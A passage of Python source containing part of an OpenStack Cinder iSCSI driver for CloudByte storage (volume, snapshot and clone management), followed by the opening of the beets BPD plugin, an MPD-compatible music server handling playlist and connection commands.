LOG.info(_LI("Volume [%s] created successfully in "
"CloudByte storage."), cb_vol)
raise loopingcall.LoopingCallDone()
elif retries == max_retries:
# All attempts exhausted
LOG.error(_LE("Error in creating volume [%(vol)s] in "
"CloudByte storage. "
"Exhausted all [%(max)s] attempts."),
{'vol': cb_vol, 'max': retries})
raise loopingcall.LoopingCallDone(retvalue=False)
else:
retries += 1
kwargs['retries'] = retries
LOG.debug("Wait for volume [%(vol)s] creation, "
"retry [%(retry)s] of [%(max)s].",
{'vol': cb_vol,
'retry': retries,
'max': max_retries})
retry_interval = (
self.configuration.cb_confirm_volume_create_retry_interval)
max_retries = (
self.configuration.cb_confirm_volume_create_retries)
kwargs = {'retries': 0,
'max_retries': max_retries,
'jobid': jobid,
'cb_vol': cb_volume_name}
timer = loopingcall.FixedIntervalLoopingCall(
_retry_check_for_volume_creation)
timer.start(interval=retry_interval).wait()
def _get_volume_id_from_response(self, cb_volumes, volume_name):
"""Search the volume in CloudByte storage."""
vol_res = cb_volumes.get('listFilesystemResponse')
if vol_res is None:
msg = _("Null response received from CloudByte's "
"list filesystem.")
raise exception.VolumeBackendAPIException(data=msg)
volumes = vol_res.get('filesystem')
if volumes is None:
msg = _('No volumes found in CloudByte storage.')
raise exception.VolumeBackendAPIException(data=msg)
volume_id = None
for vol in volumes:
if vol['name'] == volume_name:
volume_id = vol['id']
break
if volume_id is None:
msg = _("Volume [%s] not found in CloudByte "
"storage.") % volume_name
raise exception.VolumeBackendAPIException(data=msg)
return volume_id
def _get_qosgroupid_id_from_response(self, cb_volumes, volume_id):
volumes = cb_volumes['listFilesystemResponse']['filesystem']
qosgroup_id = None
for vol in volumes:
if vol['id'] == volume_id:
qosgroup_id = vol['groupid']
break
return qosgroup_id
def _build_provider_details_from_volume(self, volume):
model_update = {}
model_update['provider_location'] = (
'%s %s %s' % (volume['ipaddress'] + ':3260', volume['iqnname'], 0)
)
# Will provide CHAP Authentication on forthcoming patches/release
model_update['provider_auth'] = None
model_update['provider_id'] = volume['id']
LOG.debug("CloudByte volume [%(vol)s] properties: [%(props)s].",
{'vol': volume['iqnname'], 'props': model_update})
return model_update
def _build_provider_details_from_response(self, cb_volumes, volume_name):
"""Get provider information."""
model_update = {}
volumes = cb_volumes['listFilesystemResponse']['filesystem']
for vol in volumes:
if vol['name'] == volume_name:
model_update = self._build_provider_details_from_volume(vol)
break
return model_update
def _get_initiator_group_id_from_response(self, data):
"""Find iSCSI initiator group id."""
ig_list_res = data.get('listInitiatorsResponse')
if ig_list_res is None:
msg = _("Null response received from CloudByte's "
"list iscsi initiators.")
raise exception.VolumeBackendAPIException(data=msg)
ig_list = ig_list_res.get('initiator')
if ig_list is None:
msg = _('No iscsi initiators were found in CloudByte.')
raise exception.VolumeBackendAPIException(data=msg)
ig_id = None
for ig in ig_list:
if ig.get('initiatorgroup') == 'ALL':
ig_id = ig['id']
break
return ig_id
def _get_iscsi_service_id_from_response(self, volume_id, data):
iscsi_service_res = data.get('listVolumeiSCSIServiceResponse')
if iscsi_service_res is None:
msg = _("Null response received from CloudByte's "
"list volume iscsi service.")
raise exception.VolumeBackendAPIException(data=msg)
iscsi_service_list = iscsi_service_res.get('iSCSIService')
if iscsi_service_list is None:
msg = _('No iscsi services found in CloudByte storage.')
raise exception.VolumeBackendAPIException(data=msg)
iscsi_id = None
for iscsi_service in iscsi_service_list:
if iscsi_service['volume_id'] == volume_id:
iscsi_id = iscsi_service['id']
break
if iscsi_id is None:
msg = _("No iscsi service found for CloudByte "
"volume [%s].") % volume_id
raise exception.VolumeBackendAPIException(data=msg)
else:
return iscsi_id
def _request_update_iscsi_service(self, iscsi_id, ig_id):
params = {
"id": iscsi_id,
"igid": ig_id
}
self._api_request_for_cloudbyte(
'updateVolumeiSCSIService', params)
def _get_cb_snapshot_path(self, snapshot, volume_id):
"""Find CloudByte snapshot path."""
params = {"id": volume_id}
# List all snapshot from CloudByte
cb_snapshots_list = self._api_request_for_cloudbyte(
'listStorageSnapshots', params)
# Filter required snapshot from list
cb_snap_res = cb_snapshots_list.get('listDatasetSnapshotsResponse')
cb_snapshot = {}
if cb_snap_res is not None:
cb_snapshot = cb_snap_res.get('snapshot')
path = None
# Filter snapshot path
for snap in cb_snapshot:
if snap['name'] == snapshot['display_name']:
path = snap['path']
break
return path
def _get_account_id_from_name(self, account_name):
params = {}
data = self._api_request_for_cloudbyte("listAccount", params)
accounts = data["listAccountResponse"]["account"]
account_id = None
for account in accounts:
if account.get("name") == account_name:
account_id = account.get("id")
break
if account_id is None:
msg = _("Failed to get CloudByte account details "
"for account [%s].") % account_name
raise exception.VolumeBackendAPIException(data=msg)
return account_id
def _search_volume_id(self, cb_volumes, cb_volume_id):
"""Search the volume in CloudByte."""
volumes_res = cb_volumes.get('listFilesystemResponse')
if volumes_res is None:
msg = _("No response was received from CloudByte's "
"list filesystem api call.")
raise exception.VolumeBackendAPIException(data=msg)
volumes = volumes_res.get('filesystem')
if volumes is None:
msg = _("No volume was found at CloudByte storage.")
raise exception.VolumeBackendAPIException(data=msg)
volume_id = None
for vol in volumes:
if vol['id'] == cb_volume_id:
volume_id = vol['id']
break
return volume_id
def _generate_clone_name(self):
"""Generates clone name when it is not provided."""
clone_name = ("clone_" + time.strftime("%d%m%Y") +
time.strftime("%H%M%S"))
return clone_name
def _generate_snapshot_name(self):
"""Generates snapshot_name when it is not provided."""
snapshot_name = ("snap_" + time.strftime("%d%m%Y") +
time.strftime("%H%M%S"))
return snapshot_name
def _get_storage_info(self, tsmname):
"""Get CloudByte TSM that is associated with OpenStack backend."""
# List all TSMs from CloudByte storage
tsm_list = self._api_request_for_cloudbyte('listTsm', params={})
tsm_details_res = tsm_list.get('listTsmResponse')
if tsm_details_res is None:
msg = _("No response was received from CloudByte storage "
"list tsm API call.")
raise exception.VolumeBackendAPIException(data=msg)
tsm_details = tsm_details_res.get('listTsm')
data = {}
flag = 0
# Filter required TSM and get storage info
for tsms in tsm_details:
if tsms['name'] == tsmname:
flag = 1
data['total_capacity_gb'] = (
float(tsms['numericquota']) / units.Ki)
data['free_capacity_gb'] = (
float(tsms['availablequota']) / units.Ki)
break
# TSM not found in CloudByte storage
if flag == 0:
LOG.error(_LE("TSM [%s] not found in CloudByte storage."), tsmname)
data['total_capacity_gb'] = 0.0
data['free_capacity_gb'] = 0.0
return data
def create_volume(self, volume):
tsm_name = self.configuration.cb_tsm_name
account_name = self.configuration.cb_account_name
# Get account id of this account
account_id = self._get_account_id_from_name(account_name)
# Set backend storage volume name using OpenStack volume id
cb_volume_name = volume['id'].replace("-", "")
LOG.debug("Will create a volume [%(cb_vol)s] in TSM [%(tsm)s] "
"at CloudByte storage w.r.t "
"OpenStack volume [%(stack_vol)s].",
{'cb_vol': cb_volume_name,
'stack_vol': volume.get('id'),
'tsm': tsm_name})
tsm_data = self._request_tsm_details(account_id)
tsm_details = self._get_tsm_details(tsm_data, tsm_name)
# Send request to create a qos group before creating a volume
LOG.debug("Creating qos group for CloudByte volume [%s].",
cb_volume_name)
qos_data = self._add_qos_group_request(
volume, tsm_details.get('tsmid'), cb_volume_name)
# Extract the qos group id from response
qosgroupid = qos_data['addqosgroupresponse']['qosgroup']['id']
LOG.debug("Successfully created qos group for CloudByte volume [%s].",
cb_volume_name)
# Send a create volume request to CloudByte API
vol_data = self._create_volume_request(
volume, tsm_details.get('datasetid'), qosgroupid,
tsm_details.get('tsmid'), cb_volume_name)
# Since create volume is an async call;
# need to confirm the creation before proceeding further
self._wait_for_volume_creation(vol_data, cb_volume_name)
# Fetch iscsi id
cb_volumes = self._api_request_for_cloudbyte(
'listFileSystem', params={})
volume_id = self._get_volume_id_from_response(cb_volumes,
cb_volume_name)
params = {"storageid": volume_id}
iscsi_service_data = self._api_request_for_cloudbyte(
'listVolumeiSCSIService', params)
iscsi_id = self._get_iscsi_service_id_from_response(
volume_id, iscsi_service_data)
# Fetch the initiator group ID
params = {"accountid": account_id}
iscsi_initiator_data = self._api_request_for_cloudbyte(
'listiSCSIInitiator', params)
ig_id = self._get_initiator_group_id_from_response(
iscsi_initiator_data)
LOG.debug("Updating iscsi service for CloudByte volume [%s].",
cb_volume_name)
# Update the iscsi service with above fetched iscsi_id & ig_id
self._request_update_iscsi_service(iscsi_id, ig_id)
LOG.debug("CloudByte volume [%(vol)s] updated with "
"iscsi id [%(iscsi)s] and ig id [%(ig)s].",
{'vol': cb_volume_name, 'iscsi': iscsi_id, 'ig': ig_id})
# Provide the model after successful completion of above steps
provider = self._build_provider_details_from_response(
cb_volumes, cb_volume_name)
LOG.info(_LI("Successfully created a CloudByte volume [%(cb_vol)s] "
"w.r.t OpenStack volume [%(stack_vol)s]."),
{'cb_vol': cb_volume_name, 'stack_vol': volume.get('id')})
return provider
def delete_volume(self, volume):
params = {}
# OpenStack source volume id
source_volume_id = volume['id']
# CloudByte volume id equals OpenStack volume's provider_id
cb_volume_id = volume.get('provider_id')
LOG.debug("Will delete CloudByte volume [%(cb_vol)s] "
"w.r.t OpenStack volume [%(stack_vol)s].",
{'cb_vol': cb_volume_id, 'stack_vol': source_volume_id})
# Delete volume at CloudByte
if cb_volume_id is not None:
cb_volumes = self._api_request_for_cloudbyte(
'listFileSystem', params)
# Search cb_volume_id in CloudByte volumes
# incase it has already been deleted from CloudByte
cb_volume_id = self._search_volume_id(cb_volumes, cb_volume_id)
# Delete volume at CloudByte
if cb_volume_id is not None:
params = {"id": cb_volume_id}
self._api_request_for_cloudbyte('deleteFileSystem', params)
LOG.info(
_LI("Successfully deleted volume [%(cb_vol)s] "
"at CloudByte corresponding to "
"OpenStack volume [%(stack_vol)s]."),
{'cb_vol': cb_volume_id,
'stack_vol': source_volume_id})
else:
LOG.error(_LE("CloudByte does not have a volume corresponding "
"to OpenStack volume [%s]."), source_volume_id)
else:
LOG.error(_LE("CloudByte volume information not available for"
" OpenStack volume [%s]."), source_volume_id)
def create_snapshot(self, snapshot):
"""Creates a snapshot at CloudByte."""
# OpenStack volume
source_volume_id = snapshot['volume_id']
# CloudByte volume id equals OpenStack volume's provider_id
cb_volume_id = snapshot.get('volume').get('provider_id')
if cb_volume_id is not None:
snapshot_name = snapshot['display_name']
if snapshot_name is None or snapshot_name == '':
# Generate the snapshot name
snapshot_name = self._generate_snapshot_name()
# Update the snapshot dict for later use
snapshot['display_name'] = snapshot_name
params = {
"name": snapshot_name,
"id": cb_volume_id
}
LOG.debug(
"Will create CloudByte snapshot [%(cb_snap)s] "
"w.r.t CloudByte volume [%(cb_vol)s] "
"and OpenStack volume [%(stack_vol)s].",
{'cb_snap': snapshot_name,
'cb_vol': cb_volume_id,
'stack_vol': source_volume_id})
self._api_request_for_cloudbyte('createStorageSnapshot', params)
# Get the snapshot path from CloudByte
path = self._get_cb_snapshot_path(snapshot, cb_volume_id)
LOG.info(
_LI("Created CloudByte snapshot [%(cb_snap)s] "
"w.r.t CloudByte volume [%(cb_vol)s] "
"and OpenStack volume [%(stack_vol)s]."),
{'cb_snap': path,
'cb_vol': cb_volume_id,
'stack_vol': source_volume_id})
model_update = {}
# Store snapshot path as snapshot provider_id
model_update['provider_id'] = path
else:
msg = _("Failed to create snapshot. CloudByte volume information "
"not found for OpenStack volume [%s].") % source_volume_id
raise exception.VolumeBackendAPIException(data=msg)
return model_update
def create_cloned_volume(self, cloned_volume, src_volume):
"""Create a clone of an existing volume.
First it will create a snapshot of the source/parent volume,
then it creates a clone of this newly created snapshot.
"""
# Extract necessary information from input params
parent_volume_id = cloned_volume.get('source_volid')
# Generating name and id for snapshot
# as this is not user entered in this particular usecase
snapshot_name = self._generate_snapshot_name()
snapshot_id = (six.text_type(parent_volume_id) + "_" +
time.strftime("%d%m%Y") + time.strftime("%H%M%S"))
# Prepare the params for create_snapshot
# as well as create_volume_from_snapshot method
snapshot_params = {
'id': snapshot_id,
'display_name': snapshot_name,
'volume_id': parent_volume_id,
'volume': src_volume,
}
# Create a snapshot
snapshot = self.create_snapshot(snapshot_params)
snapshot_params['provider_id'] = snapshot.get('provider_id')
# Create a clone of above snapshot
return self.create_volume_from_snapshot(cloned_volume, snapshot_params)
def create_volume_from_snapshot(self, cloned_volume, snapshot):
"""Create a clone from an existing snapshot."""
# Getting necessary data from input params
parent_volume_id = snapshot['volume_id']
cloned_volume_name = cloned_volume['id'].replace("-", "")
# CloudByte volume id equals OpenStack volume's provider_id
cb_volume_id = snapshot.get('volume').get('provider_id')
# CloudByte snapshot path equals OpenStack snapshot's provider_id
cb_snapshot_path = snapshot['provider_id']
params = {
"id": cb_volume_id,
"clonename": cloned_volume_name,
"path": cb_snapshot_path
}
LOG.debug(
"Will create CloudByte clone [%(cb_clone)s] "
"at CloudByte snapshot path [%(cb_snap)s] "
"w.r.t parent OpenStack volume [%(stack_vol)s].",
{'cb_clone': cloned_volume_name,
'cb_snap': cb_snapshot_path,
'stack_vol': parent_volume_id})
# Create clone of the snapshot
clone_dataset_snapshot_res = (
self._api_request_for_cloudbyte('cloneDatasetSnapshot', params))
cb_snap = clone_dataset_snapshot_res.get('cloneDatasetSnapshot')
cb_vol = {}
if cb_snap is not None:
cb_vol = cb_snap.get('filesystem')
else:
msg = ("Error: Clone creation failed for "
"OpenStack volume [%(vol)s] with CloudByte "
"snapshot path [%(path)s]" %
{'vol': parent_volume_id, 'path': cb_snapshot_path})
raise exception.VolumeBackendAPIException(data=msg)
LOG.info(
_LI("Created a clone [%(cb_clone)s] "
"at CloudByte snapshot path [%(cb_snap)s] "
"w.r.t parent OpenStack volume [%(stack_vol)s]."),
{'cb_clone': cloned_volume_name,
'cb_snap': cb_snapshot_path,
'stack_vol': parent_volume_id})
return self._build_provider_details_from_volume(cb_vol)
def delete_snapshot(self, snapshot):
"""Delete a snapshot at CloudByte."""
# Find volume id
source_volume_id = snapshot['volume_id']
# CloudByte volume id equals OpenStack volume's provider_id
cb_volume_id = snapshot.get('volume').get('provider_id')
# CloudByte snapshot path equals OpenStack snapshot's provider_id
cb_snapshot_path = snapshot['provider_id']
# If cb_snapshot_path is 'None'
# then no need to execute CloudByte API
if cb_snapshot_path is not None:
params = {
"id": cb_volume_id,
"path": cb_snapshot_path
}
LOG.debug("Will delete CloudByte snapshot [%(snap)s] w.r.t "
"parent CloudByte volume [%(cb_vol)s] "
"and parent OpenStack volume [%(stack_vol)s].",
{'snap': cb_snapshot_path,
'cb_vol': cb_volume_id,
'stack_vol': source_volume_id})
# Execute CloudByte API
self._api_request_for_cloudbyte('deleteSnapshot', params)
LOG.info(
_LI("Deleted CloudByte snapshot [%(snap)s] w.r.t "
"parent CloudByte volume [%(cb_vol)s] "
"and parent OpenStack volume [%(stack_vol)s]."),
{'snap': cb_snapshot_path,
'cb_vol': cb_volume_id,
'stack_vol': source_volume_id})
else:
LOG.error(_LE("CloudByte snapshot information is not available"
" for OpenStack volume [%s]."), source_volume_id)
def extend_volume(self, volume, new_size):
# CloudByte volume id equals OpenStack volume's provider_id
cb_volume_id = volume.get('provider_id')
params = {
"id": cb_volume_id,
"quotasize": six.text_type(new_size) + 'G'
}
# Request the CloudByte api to update the volume
self._api_request_for_cloudbyte('updateFileSystem', params)
def create_export(self, context, volume):
"""Setup the iscsi export info."""
model_update = {}
# Will provide CHAP Authentication on forthcoming patches/release
model_update['provider_auth'] = None
return model_update
def ensure_export(self, context, volume):
"""Verify the iscsi export info."""
model_update = {}
# Will provide CHAP Authentication on forthcoming patches/release
model_update['provider_auth'] = None
return model_update
def get_volume_stats(self, refresh=False):
"""Get volume statistics.
If 'refresh' is True, update/refresh the statistics first.
"""
if refresh:
# Get the TSM name from configuration
tsm_name = self.configuration.cb_tsm_name
# Get the storage details of this TSM
data = self._get_storage_info(tsm_name)
data["volume_backend_name"] = (
self.configuration.safe_get('volume_backend_name') or
'CloudByte')
data["vendor_name"] = 'CloudByte'
data['reserved_percentage'] = 0
data["driver_version"] = CloudByteISCSIDriver.VERSION
data["storage_protocol"] = 'iSCSI'
LOG.debug("CloudByte driver stats: [%s].", data)
# Set this to the instance variable
self.volume_stats = data
return self.volume_stats
|
|
# -*- coding: utf-8 -*-
# This file is part of beets.
# Copyright 2015, Adrian Sampson.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""A clone of the Music Player Daemon (MPD) that plays music from a
Beets library. Attempts to implement a compatible protocol to allow
use of the wide range of MPD clients.
"""
from __future__ import (division, absolute_import, print_function,
unicode_literals)
import re
from string import Template
import traceback
import random
import time
import beets
from beets.plugins import BeetsPlugin
import beets.ui
from beets import logging
from beets import vfs
from beets.util import bluelet
from beets.library import Item
from beets import dbcore
from beets.mediafile import MediaFile
PROTOCOL_VERSION = '0.13.0'
BUFSIZE = 1024
HELLO = 'OK MPD %s' % PROTOCOL_VERSION
CLIST_BEGIN = 'command_list_begin'
CLIST_VERBOSE_BEGIN = 'command_list_ok_begin'
CLIST_END = 'command_list_end'
RESP_OK = 'OK'
RESP_CLIST_VERBOSE = 'list_OK'
RESP_ERR = 'ACK'
NEWLINE = u"\n"
ERROR_NOT_LIST = 1
ERROR_ARG = 2
ERROR_PASSWORD = 3
ERROR_PERMISSION = 4
ERROR_UNKNOWN = 5
ERROR_NO_EXIST = 50
ERROR_PLAYLIST_MAX = 51
ERROR_SYSTEM = 52
ERROR_PLAYLIST_LOAD = 53
ERROR_UPDATE_ALREADY = 54
ERROR_PLAYER_SYNC = 55
ERROR_EXIST = 56
VOLUME_MIN = 0
VOLUME_MAX = 100
SAFE_COMMANDS = (
# Commands that are available when unauthenticated.
u'close', u'commands', u'notcommands', u'password', u'ping',
)
ITEM_KEYS_WRITABLE = set(MediaFile.fields()).intersection(Item._fields.keys())
# Loggers.
log = logging.getLogger('beets.bpd')
global_log = logging.getLogger('beets')
# Gstreamer import error.
class NoGstreamerError(Exception):
pass
# Error-handling, exceptions, parameter parsing.
class BPDError(Exception):
"""An error that should be exposed to the client to the BPD
server.
"""
def __init__(self, code, message, cmd_name='', index=0):
self.code = code
self.message = message
self.cmd_name = cmd_name
self.index = index
template = Template(u'$resp [$code@$index] {$cmd_name} $message')
def response(self):
"""Returns a string to be used as the response code for the
erring command.
"""
return self.template.substitute({
'resp': RESP_ERR,
'code': self.code,
'index': self.index,
'cmd_name': self.cmd_name,
'message': self.message,
})
def make_bpd_error(s_code, s_message):
"""Create a BPDError subclass for a static code and message.
"""
class NewBPDError(BPDError):
code = s_code
message = s_message
cmd_name = ''
index = 0
def __init__(self):
pass
return NewBPDError
ArgumentTypeError = make_bpd_error(ERROR_ARG, 'invalid type for argument')
ArgumentIndexError = make_bpd_error(ERROR_ARG, 'argument out of range')
ArgumentNotFoundError = make_bpd_error(ERROR_NO_EXIST, 'argument not found')
def cast_arg(t, val):
"""Attempts to call t on val, raising a ArgumentTypeError
on ValueError.
If 't' is the special string 'intbool', attempts to cast first
to an int and then to a bool (i.e., 1=True, 0=False).
"""
if t == 'intbool':
return cast_arg(bool, cast_arg(int, val))
else:
try:
return t(val)
except ValueError:
raise ArgumentTypeError()
class BPDClose(Exception):
"""Raised by a command invocation to indicate that the connection
should be closed.
"""
# Generic server infrastructure, implementing the basic protocol.
class BaseServer(object):
"""A MPD-compatible music player server.
The functions with the `cmd_` prefix are invoked in response to
client commands. For instance, if the client says `status`,
`cmd_status` will be invoked. The arguments to the client's commands
are used as function arguments following the connection issuing the
command. The functions may send data on the connection. They may
also raise BPDError exceptions to report errors.
This is a generic superclass and doesn't support many commands.
"""
def __init__(self, host, port, password):
"""Create a new server bound to address `host` and listening
on port `port`. If `password` is given, it is required to do
anything significant on the server.
"""
self.host, self.port, self.password = host, port, password
# Default server values.
self.random = False
self.repeat = False
self.volume = VOLUME_MAX
self.crossfade = 0
self.playlist = []
self.playlist_version = 0
self.current_index = -1
self.paused = False
self.error = None
# Object for random numbers generation
self.random_obj = random.Random()
def run(self):
"""Block and start listening for connections from clients. An
interrupt (^C) closes the server.
"""
self.startup_time = time.time()
bluelet.run(bluelet.server(self.host, self.port,
Connection.handler(self)))
def _item_info(self, item):
"""An abstract method that should response lines containing a
single song's metadata.
"""
raise NotImplementedError
def _item_id(self, item):
"""An abstract method returning the integer id for an item.
"""
raise NotImplementedError
def _id_to_index(self, track_id):
"""Searches the playlist for a song with the given id and
returns its index in the playlist.
"""
track_id = cast_arg(int, track_id)
for index, track in enumerate(self.playlist):
if self._item_id(track) == track_id:
return index
# Loop finished with no track found.
raise ArgumentNotFoundError()
def _random_idx(self):
"""Returns a random index different from the current one.
If there are no songs in the playlist it returns -1.
If there is only one song in the playlist it returns 0.
"""
if len(self.playlist) < 2:
return len(self.playlist) - 1
new_index = self.random_obj.randint(0, len(self.playlist) - 1)
while new_index == self.current_index:
new_index = self.random_obj.randint(0, len(self.playlist) - 1)
return new_index
def _succ_idx(self):
"""Returns the index for the next song to play.
It also considers random and repeat flags.
No boundaries are checked.
"""
if self.repeat:
return self.current_index
if self.random:
return self._random_idx()
return self.current_index + 1
def _prev_idx(self):
"""Returns the index for the previous song to play.
It also considers random and repeat flags.
No boundaries are checked.
"""
if self.repeat:
return self.current_index
if self.random:
return self._random_idx()
return self.current_index - 1
def cmd_ping(self, conn):
"""Succeeds."""
pass
def cmd_kill(self, conn):
"""Exits the server process."""
exit(0)
def cmd_close(self, conn):
"""Closes the connection."""
raise BPDClose()
def cmd_password(self, conn, password):
"""Attempts password authentication."""
if password == self.password:
conn.authenticated = True
else:
conn.authenticated = False
raise BPDError(ERROR_PASSWORD, 'incorrect password')
def cmd_commands(self, conn):
"""Lists the commands available to the user."""
if self.password and not conn.authenticated:
# Not authenticated. Show limited list of commands.
for cmd in SAFE_COMMANDS:
yield u'command: ' + cmd
else:
# Authenticated. Show all commands.
for func in dir(self):
if func.startswith('cmd_'):
yield u'command: ' + func[4:]
def cmd_notcommands(self, conn):
"""Lists all unavailable commands."""
if self.password and not conn.authenticated:
# Not authenticated. Show privileged commands.
for func in dir(self):
if func.startswith('cmd_'):
cmd = func[4:]
if cmd not in SAFE_COMMANDS:
yield u'command: ' + cmd
else:
# Authenticated. No commands are unavailable.
pass
def cmd_status(self, conn):
"""Returns some status information for use with an
implementation of cmd_status.
Gives a list of response-lines for: volume, repeat, random,
playlist, playlistlength, and xfade.
"""
yield (
u'volume: ' + unicode(self.volume),
u'repeat: ' + unicode(int(self.repeat)),
u'random: ' + unicode(int(self.random)),
u'playlist: ' + unicode(self.playlist_version),
u'playlistlength: ' + unicode(len(self.playlist)),
u'xfade: ' + unicode(self.crossfade),
)
if self.current_index == -1:
state = u'stop'
elif self.paused:
state = u'pause'
else:
state = u'play'
yield u'state: ' + state
if self.current_index != -1: # i.e., paused or playing
current_id = self._item_id(self.playlist[self.current_index])
yield u'song: ' + unicode(self.current_index)
yield u'songid: ' + unicode(current_id)
if self.error:
yield u'error: ' + self.error
def cmd_clearerror(self, conn):
"""Removes the persistent error state of the server. This
error is set when a problem arises not in response to a
command (for instance, when playing a file).
"""
self.error = None
def cmd_random(self, conn, state):
"""Set or unset random (shuffle) mode."""
self.random = cast_arg('intbool', state)
def cmd_repeat(self, conn, state):
"""Set or unset repeat mode."""
self.repeat = cast_arg('intbool', state)
def cmd_setvol(self, conn, vol):
"""Set the player's volume level (0-100)."""
vol = cast_arg(int, vol)
if vol < VOLUME_MIN or vol > VOLUME_MAX:
raise BPDError(ERROR_ARG, u'volume out of range')
self.volume = vol
def cmd_crossfade(self, conn, crossfade):
"""Set the number of seconds of crossfading."""
crossfade = cast_arg(int, crossfade)
if crossfade < 0:
raise BPDError(ERROR_ARG, u'crossfade time must be nonnegative')
def cmd_clear(self, conn):
"""Clear the playlist."""
self.playlist = []
self.playlist_version += 1
self.cmd_stop(conn)
def cmd_delete(self, conn, index):
"""Remove the song at index from the playlist."""
index = cast_arg(int, index)
try:
del(self.playlist[index])
except IndexError:
raise ArgumentIndexError()
self.playlist_version += 1
if self.current_index == index: # Deleted playing song.
self.cmd_stop(conn)
elif index < self.current_index: # Deleted before playing.
# Shift playing index down.
self.current_index -= 1
def cmd_deleteid(self, conn, track_id):
self.cmd_delete(conn, self._id_to_index(track_id))
def cmd_move(self, conn, idx_from, idx_to):
"""Move a track in the playlist."""
idx_from = cast_arg(int, idx_from)
idx_to = cast_arg(int, idx_to)
try:
track = self.playlist.pop(idx_from)
self.playlist.insert(idx_to, track)
except IndexError:
raise ArgumentIndexError()
# Update currently-playing song.
if idx_from == self.current_index:
self.current_index = idx_to
elif idx_from < self.current_index <= idx_to:
self.current_index -= 1
elif idx_from > self.current_index >= idx_to:
self.current_index += 1
self.playlist_version += 1
def cmd_moveid(self, conn, idx_from, idx_to):
idx_from = self._id_to_index(idx_from)
return self.cmd_move(conn, idx_from, idx_to)
def cmd_swap(self, conn, i, j):
"""Swaps two tracks in the playlist."""
i = cast_arg(int, i)
j = cast_arg(int, j)
try:
track_i = self.playlist[i]
track_j = self.playlist[j]
except IndexError:
raise ArgumentIndexError()
self.playlist[j] = track_i
self.playlist[i] = track_j
# Update currently-playing song.
if self.current_index == i:
self.current_index = j
elif self.current_index == j:
self.current_index = i
self.playlist_version += 1
def cmd_swapid(self, conn, i_id, j_id):
i = self._id_to_index(i_id)
j = self._id_to_index(j_id)
return self.cmd_swap(conn, i, j)
def cmd_urlhandlers(self, conn):
"""Indicates supported URL schemes. None by default."""
pass
def cmd_playlistinfo(self, conn, index=-1):
"""Gives metadata information about the entire playlist or a
single track, given by its index.
"""
index = cast_arg(int, index)
if index == -1:
for track in self.playlist:
yield self._item_info(track)
else:
try:
track = self.playlist[index]
except IndexError:
raise ArgumentIndexError()
yield self._item_info(track)
def cmd_playlistid(self, conn, track_id=-1):
return self.cmd_playlistinfo(conn, self._id_to_index(track_id))
def cmd_plchanges(self, conn, version):
"""Sends playlist changes since the given version.
This is a "fake" implementation that ignores the version and
just returns the entire playlist (rather like version=0). This
seems to satisfy many clients.
"""
return self.cmd_playlistinfo(conn)
def cmd_plchangesposid(self, conn, version):
"""Like plchanges, but only sends position and id.
Also a dummy implementation.
"""
for idx, track in enumerate(self.playlist):
yield u'cpos: ' + unicode(idx)
yield u'Id: ' + unicode(track.id)
def cmd_currentsong(self, conn):
"""Sends information about the currently-playing song.
"""
if self.current_index != -1: # -1 means stopped.
track = self.playlist[self.current_index]
yield self._item_info(track)
def cmd_next(self, conn):
"""Advance to the next song in the playlist."""
self.current_index = self._succ_idx()
if self.current_index >= len(self.playlist):
# Fallen off the end. Just move to stopped state.
return self.cmd_stop(conn)
else:
return self.cmd_play(conn)
def cmd_previous(self, conn):
"""Step back to the last song."""
self.current_index = self._prev_idx()
if self.current_index < 0:
return self.cmd_stop(conn)
else:
return self.cmd_play(conn)
def cmd_pause(self, conn, state=None):
"""Set the pause state playback."""
if state is None:
self.paused = not self.paused # Toggle.
else:
self.paused = cast_arg('intbool', state)
def cmd_play(self, conn, index=-1):
"""Begin playback, possibly at a specified playlist index."""
index = cast_arg(int, index)
if index < -1 or index > len(self.playlist):
raise ArgumentIndexError()
if index == -1: # No index specified: start where we are.
if not self.playlist: # Empty playlist: stop immediately.
return self.cmd_stop(conn)
if self.current_index == -1: # No current song.
self.current_index = 0 # Start at the beginning.
# If we have a current song, just stay there.
else: # Start with the specified index.
self.current_index = index
self.paused = False
def cmd_playid(self, conn, track_id=0):
track_id = cast_arg(int, track_id)
if track_id == -1:
index = -1
else:
index = self._id_to_index(track_id)
return self.cmd_play(conn, index)
def cmd_stop(self, conn):
"""Stop playback."""
self.current_index = -1
self.paused = False
def cmd_seek(self, conn, index, pos):
"""Seek to a specified point in a specified song."""
index = cast_arg(int, index)
if index < 0 or index >= len(self.playlist):
raise ArgumentIndexError()
self.current_index = index
def cmd_seekid(self, conn, track_id, pos):
index = self._id_to_index(track_id)
return self.cmd_seek(conn, index, pos)
def cmd_profile(self, conn):
"""Memory profiling for debugging."""
from guppy import hpy
heap = hpy().heap()
print(heap)
class Connection(object):
"""A connection between a client and the server. Handles input and
output from and to the client.
"""
def __init__(self, server, sock):
"""Create a new connection for the accepted socket `client`.
"""
self.server = server
self.sock = sock
self.authenticated = False
def send(self, lines):
"""Send lines, which which is either a single string or an
iterable consisting of strings, to the client. A newline is
added after every string. Returns a Bluelet event that sends
the data.
"""
if isinstance(lines, basestring):
lines = [lines]
out = NEWLINE.join(lines) + NEWLINE
log.debug('{}', out[:-1]) # Don't log trailing newline.
if isinstance(out, unicode):
out = out.encode('utf8')
return self.sock.sendall(out)
def do_command(self, command):
"""A coroutine that runs the given command and sends an
appropriate response."""
try:
yield bluelet.call(command.run(self))
except BPDError as e:
# Send the error.
yield self.send(e.response())
else:
# Send success code.
yield self.send(RESP_OK)
def run(self):
"""Send a greeting to the client and begin processing commands
as they arrive.
"""
yield self.send(HELLO)
clist = None # Initially, no command list is being constructed.
while True:
line = yield self.sock.readline()
if not line:
break
line = line.strip()
if not line:
break
log.debug('{}', line)
if clist is not None:
# Command list already opened.
if line == CLIST_END:
yield bluelet.call(self.do_command(clist))
clist = None # Clear the command list.
else:
clist.append(Command(line))
elif line == CLIST_BEGIN or line == CLIST_VERBOSE_BEGIN:
# Begin a command list.
clist = CommandList([], line == CLIST_VERBOSE_BEGIN)
else:
# Ordinary command.
try:
yield bluelet.call(self.do_command(Command(line)))
except BPDClose:
# Command indicates that the conn should close.
self.sock.close()
return
@classmethod
def handler(cls, server):
def _handle(sock):
"""Creates a new `Connection` and runs it.
"""
return cls(server, sock).run()
return _handle
class Command(object):
"""A command issued by the client for processing by the server.
"""
